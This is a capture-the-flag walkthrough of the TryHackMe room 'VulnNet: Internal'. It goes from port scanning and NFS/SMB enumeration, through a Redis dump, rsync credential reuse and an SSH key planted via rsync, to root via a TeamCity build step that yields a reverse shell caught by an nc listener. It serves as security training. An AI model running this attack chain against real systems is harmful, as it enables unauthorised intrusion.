VulnNet: Internal

TryHackMe: VulNet: Internal by MindOverflow

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can't make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you're tasked to perform a penetration test of their network and report your findings.

Difficulty: Easy/Medium
Operating System: Linux

This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It's supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags.

Note: It might take 3-5 minutes for all the services to boot.

Author: TheCyb3rW0lf
Discord: CyberWølf#8594

Icon made by Freepik from www.flaticon.com

Enumeration

Let's throw an entry into /etc/hosts and fire up rustscan

──╼ $rustscan -a vulnetint -- -sC -sV -A -oA vulnetint -vv
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.206.9:22
Open 10.10.206.9:111
Open 10.10.206.9:139
Open 10.10.206.9:445
Open 10.10.206.9:873
Open 10.10.206.9:2049
Open 10.10.206.9:6379
Open 10.10.206.9:41887
Open 10.10.206.9:43419
Open 10.10.206.9:46523
Open 10.10.206.9:59159
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 20:11 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating Ping Scan at 20:11
Scanning 10.10.206.9 [2 ports]
Completed Ping Scan at 20:11, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 20:11
Scanning vulnetint (10.10.206.9) [11 ports]
Discovered open port 445/tcp on 10.10.206.9
Discovered open port 139/tcp on 10.10.206.9
Discovered open port 111/tcp on 10.10.206.9
Discovered open port 22/tcp on 10.10.206.9
Discovered open port 46523/tcp on 10.10.206.9
Discovered open port 41887/tcp on 10.10.206.9
Discovered open port 6379/tcp on 10.10.206.9
Discovered open port 873/tcp on 10.10.206.9
Discovered open port 59159/tcp on 10.10.206.9
Discovered open port 2049/tcp on 10.10.206.9
Discovered open port 43419/tcp on 10.10.206.9
Completed Connect Scan at 20:11, 0.08s elapsed (11 total ports)
Initiating Service scan at 20:11
Scanning 11 services on vulnetint (10.10.206.9)
Completed Service scan at 20:11, 16.19s elapsed (11 services on 1 host)
NSE: Script scanning 10.10.206.9.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 2.15s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.18s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Nmap scan report for vulnetint (10.10.206.9)
Host is up, received conn-refused (0.040s latency).
Scanned at 2021-07-28 20:11:16 BST for 19s

PORT      STATE SERVICE     REASON  VERSION
22/tcp    open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open  rpcbind     syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      46523/tcp   mountd
|   100005  1,2,3      51879/udp   mountd
|   100005  1,2,3      52807/tcp6  mountd
|   100005  1,2,3      59253/udp6  mountd
|   100021  1,3,4      33920/udp6  nlockmgr
|   100021  1,3,4      41021/tcp6  nlockmgr
|   100021  1,3,4      41887/tcp   nlockmgr
|   100021  1,3,4      44664/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open  rsync       syn-ack (protocol version 31)
2049/tcp  open  nfs_acl     syn-ack 3 (RPC #100227)
6379/tcp  open  redis       syn-ack Redis key-value store
41887/tcp open  nlockmgr    syn-ack 1-4 (RPC #100021)
43419/tcp open  mountd      syn-ack 1-3 (RPC #100005)
46523/tcp open  mountd      syn-ack 1-3 (RPC #100005)
59159/tcp open  mountd      syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: 0s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   VULNNET-INTERNA<00>  Flags: <unique><active>
|   VULNNET-INTERNA<03>  Flags: <unique><active>
|   VULNNET-INTERNA<20>  Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 24150/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 44345/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12822/udp): CLEAN (Failed to receive data)
|   Check 4 (port 31018/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2021-07-28T21:11:33+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-28T19:11:33
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

NFS

Looking at the above NFS is open so let's take a look

└──╼ $showmount -e vulnetint
Export list for vulnetint:
/opt/conf *

We have a conf directory exported so lets mount that and take a look.

┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $mkdir conf
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $sudo mount vulnetint:/opt/conf conf
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $ls conf/
hp  init  opt  profile.d  redis  vim  wildmidi
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint/conf]
└──╼ $ls *
hp:
hplip.conf

init:
anacron.conf  lightdm.conf  whoopsie.conf

opt:

profile.d:
bash_completion.sh  cedilla-portuguese.sh  input-method-config.sh  vte-2.91.sh

redis:
redis.conf

vim:
vimrc  vimrc.tiny

wildmidi:
wildmidi.cfg

Looking through the files the following looks interesting in the redis.conf

slave-serve-stale-data yes

requirepass "[REDACTED]"

They might have reused that password so will bank it.

Samba

└──╼ $smbclient -N -L //vulnetint

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	shares          Disk      VulnNet Business Shares
	IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Let us take a look in shares

└──╼ $smbclient -N //vulnetint/shares
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb  2 09:20:09 2021
  ..                                  D        0  Tue Feb  2 09:28:11 2021
  temp                                D        0  Sat Feb  6 11:45:10 2021
  data                                D        0  Tue Feb  2 09:27:33 2021

		11309648 blocks of size 1024. 3276124 blocks ava

Here under temp we find our first flag
sh

smb: \> cd temp
smb: \temp\> ls
  .                                   D        0  Sat Feb  6 11:45:10 2021
  ..                                  D        0  Tue Feb  2 09:20:09 2021
  services.txt                        N       38  Sat Feb  6 11:45:09 2021

		11309648 blocks of size 1024. 3276124 blocks available
smb: \temp\> get services.txt
getting file \temp\services.txt of size 38 as services.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec

Moving on to data let's grab the files under there...

smb: \> cd data
smb: \data\> ls
  .                                   D        0  Tue Feb  2 09:27:33 2021
  ..                                  D        0  Tue Feb  2 09:20:09 2021
  data.txt                            N       48  Tue Feb  2 09:21:18 2021
  business-req.txt                    N      190  Tue Feb  2 09:27:33 2021

		11309648 blocks of size 1024. 3276124 blocks available
smb: \data\> get data.txt
getting file \data\data.txt of size 48 as data.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \data\> get business-req.txt
getting file \data\business-req.txt of size 190 as business-req.txt (1.0 KiloBytes/sec) (average 0.6 Kilo

Let's take a look at these

└──╼ $cat data.txt 
Purge regularly data that is not needed anymore

└──╼ $cat business-req.txt 
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.

Hmm a bit cryptic and not help as of yet..... what else was open....

redis

Using the password we found earlier we can use nc to connect to redis and query the server info

└──╼ $nc vulnetint 6379
auth [REDACTED]
+OK
info 
$2755
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-135-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:538
run_id:2b688688620553ed8733a92036cdb5fb00ca868c
tcp_port:6379
uptime_in_seconds:2223
uptime_in_days:0
hz:10
lru_clock:110996
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:841488
used_memory_human:821.77K
used_memory_rss:2842624
used_memory_rss_human:2.71M
used_memory_peak:841488
used_memory_peak_human:821.77K
used_memory_peak_perc:100.00%
used_memory_overhead:832358
used_memory_startup:782432
used_memory_dataset:9130
used_memory_dataset_perc:15.46%
total_system_memory:2087923712
total_system_memory_human:1.94G
used_memory_lua:37888
used_memory_lua_human:37.00K
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
mem_fragmentation_ratio:3.38
mem_allocator:jemalloc-3.6.0
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1627498725
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:6
total_commands_processed:9
instantaneous_ops_per_sec:0
total_net_input_bytes:190
total_net_output_bytes:525
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:8
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:7f9d24aef91081f5a01398919e0d1094ac00513b
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:1.55
used_cpu_user:0.92
used_cpu_sys_children:0.00
used_cpu_user_children:0.00

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=5,expires=0,avg_ttl=0

After messing around with redis I ended up just dumping it to get the internal flag

└──╼ $redis-cli -h vulnetint -a [REDACTED] --rdb dump.rdb
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
sending REPLCONF capa eof
SYNC sent to master, writing 762 bytes to 'dump.rdb'
Transfer finished with success.
Transfer finished with success.

└──╼ $grep -a flag dump.rdb 
internal flag%THM{[REDACTED]}

Inside here we also have a "authlist" key which we can query as below

vulnetint:6379> select 0
OK
vulnetint:6379> keys *
1) "1"
2) "internal flag"
3) "marketlist"
4) "authlist"
5) "int"
6) "tmp"
vulnetint:6379> lrange authlist 0 99
1) "[REDACTED]="
2) "[REDACTED]="
3) "[REDACTED]="
4) "[REDACTED]="

Running this throuogh base64 we get

└──╼ $echo [REDACTED]| base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password [REDACTED]

We can know use rysnc to grab files off the target

└──╼ $rsync -av rsync://rsync-connect@vulnetint/

from here we can grab user.txt

cat sys-internal/user.txt

Foothold

Ok, using the access via rsync lets send over our public key

└──╼ $cat ~/.ssh/id_rsa.pub > .ssh/authorized_keys
└──╼ $sudo chown 0600 .ssh/authorised_keys
└──╼ $rsync -av .ssh/* rsync://rsync-connect@vulnetint/files/sys-internal/.s

──╼ $ssh sys-internal@vulnetint
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sys-internal@vulnnet-internal:~$ 

Boom!! we are on the box, unfortunatley we need a password for sudo so let's see if we can find another privesc route...

Let's copy linpeas.sh across and see what we find....

-rwsr-xr-x 1 root root 621K Feb  1 14:44 /usr/local/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable

╔══════════╣ Unexpected in root
/TeamCity

TeamCity

There is a java app listening on 127.0.0.1:8111, to access this we will need to do some poprt forwarding

└──╼ $ssh -L 8111:127.0.0.1:8111 sys-internal@vulnetint

As no admin exists we can create a login using the auth token

sys-internal@vulnnet-internal:/TeamCity/logs$ grep "authentication token" /TeamCity/logs/* 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)

Now we are logged in we need to find a way to exploit this..... So TeamCity looks like a build system, digging around I create new project and then add a build script to run a command line.

I then click Run in the top right which results in reverseshell as root

└──╼ $nc -lvp 8888
Listening on 0.0.0.0 8888



Connection received on vulnetint 34872
/bin/sh: 0: can't access tty; job control turned off
# # # # id
uid=0(root) gid=0(root) groups=0(root)
# cd
# ls
root.txt
# cat root.txt
THM{[REDACTED]}

Done!

Another room done, although this was an Easy ranked room it took me longer that I would have liked in part due to the fact that I do not know allot about redis....